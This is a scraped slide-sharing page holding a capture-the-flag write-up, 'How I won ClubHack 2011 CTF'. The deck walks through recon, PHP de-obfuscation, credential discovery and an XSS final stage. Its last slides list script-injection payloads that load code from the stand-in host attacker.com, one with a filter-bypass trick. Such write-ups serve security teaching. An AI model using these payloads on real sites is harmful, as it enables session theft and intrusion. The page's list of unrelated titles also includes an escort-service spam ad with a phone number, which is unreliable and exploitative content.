FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptxFINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx
 
Judging the Relevance and worth of ideas part 2.pptx
Judging the Relevance and worth of ideas part 2.pptxJudging the Relevance and worth of ideas part 2.pptx
Judging the Relevance and worth of ideas part 2.pptx
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 

How i-won-club hack-precon-ctf-v2

  • 1. How I won ClubHack 2011 CTF AMol NAik http://amolnaik4.blogspot.com
  • 2. Agenda  Introduction to CTF  ClubHack 2011 preCON CTF  Tools  Execution Stages  Thanks/Questions
  • 3. Introduction to CTF  CTF stands for Capture the Flag  Types:  Pre-conference  Educational  Web based  Exploitation  Web + Exploitation  Teams / Individuals  Offensive / Defensive
  • 4. ClubHack 2011 preCON CTF  Free conference entry  Qualified to play Treasure Hunt @ClubHack  Physical CTF  Web Based
  • 5. Tools  Mozilla Firefox  Add-on: Tamper Data  Web Server with PHP  Brain  Time  Patience  ……..  ……..
  • 6. Execution  Register for the event  Access CTF site  Gather Information & Analyze  Look for hidden treasures  Get the Flag and Submit
  • 7. Stage - 1  Information Gathering  Download.html  Can be used to download files from server  Two params: filename & some HASH  How imp the hash is in file download ?  What type of Hash it is?  How to generate it?  UserLogin.html  Auth Bypass  Guessable Logins  What else ???
  • 8. Stage - 1  Analysis  Download.html  Need hash to download file  Hash is SHA1  How to generate it?  UserLogin.html  No SQLi  No Auth Bypass  No Guessable Login  Brute Force ???
  • 9. Stage - 2  Deep Inspection  Found „execute.php‟ in source of download.html   Looks like command utility  OS commanding ???  Analysis  No OS command execution  “Wonly one command”  Commands which takes „file‟ as parameter ???  Single Command  sha1sum
  • 10. Stage - 3  Something to work on  Hash generation – execute.php  File Download – download.php  Login – UserLogin.php  Try to download files  Download.php  Execute.php  UserLogin.php  Analysis  Only „UserLogin.php‟ is possible to download
  • 11. Stage - 4  Obfuscated PHP Code  UserLogin.php is obfuscated  “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a r”  No Online de-obfuscation tool available   I was not able to find out one  Analysis  Go Manual Mode !!  Create scripts
  • 12. Stage - 5  De-Obfuscation  Replace eval() with echo() -  Base64_decode()  Decode $variable names  Replace $variables -  ROT13 -> Base64_decode() -> gzinflate()  Just echo  -
  • 13. Stage - 5  Analysis  Credentials -> „myhashesarenothere.txt‟  Successful Login -> Final.php  Next  Access „myhashesarenothere.txt‟  Login in UserLogin.php
  • 14. Stage – 6: Final  Information Gathering  POST form  Looks like mail client  Hard-coded email addresses & Subject  Message is the only available space for User Input  Analysis  Tamper „TO‟ email address & „Subject‟  Test „Message‟ for SQLi, Code Injection, ….  What else ???
  • 15. Stage – 6: Final  Damn…It‟s a ROCK !!!!  No server-side bug  Code Injection  SQLi  Only XSS  No <script> & <img>  May be flag.txt  May be messages.txt || mail.txt || sec*.txt  ?????  ?????
  • 16. Stage – 6: Final  A Ray of Hope  Tweet from @ClubHack  Only “XSS”  Never seen XSS in CTF  What to exploit?  Myself??  Event Handlers  document.cookie  Did they mean “Some Cookie” ?
  • 17. Final  After 2-days  Got Flag & Submit link   Free entry to ClubHack -> Secured !!  Payloads Used:  <ScRiPt src=“http://attacker.com/evil.js”></script>  me  <scr<script>ipt src=“http://attacker.com/evil.js”></script>  Vishal Oza
  • 18. Thanks/Questions  webDEViL  CTF Creation and Access for “Live Demo”  ClubHack  Organizing CTF challenge  For Gifts !!! http://twitter.com/amolnaik4